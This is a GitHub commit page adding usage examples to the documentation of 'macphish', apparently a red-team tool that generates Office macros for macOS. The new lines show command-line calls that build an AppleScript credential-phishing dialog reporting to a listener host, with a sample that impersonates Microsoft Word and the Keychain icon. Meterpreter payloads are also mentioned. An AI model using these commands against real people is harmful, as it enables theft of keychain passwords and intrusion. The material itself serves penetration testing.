Skip to content

Commit

Permalink
Adds usage examples about custom dialogs
Browse files Browse the repository at this point in the history
  • Loading branch information
cldrn authored Sep 19, 2017
1 parent 6e6b6c9 commit 6cf1786
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions USAGE.md
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,14 @@ To generate the macro:
To generate the Applescript payload to be executed from a shell:

$./macphish.py -a creds -lh <host>

To customize the icon, title and message used in the dialog:

./macphish.py -lh <host> -a creds -t <title> -msg <msg> -i <icon>

For example, to use the keychain icon:

./macphish.py -lh 0xdead -a creds -t "Microsoft Word" -msg "Unlock your keychain to decrypt this file" -i "file \"Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns\""

## meterpreter (Office 2011/Office 2016 with limitations)
This module generates python meterpreter payloads. In Office 2016, it will run inside the App Sandbox.
Expand Down

0 comments on commit 6cf1786

Please sign in to comment.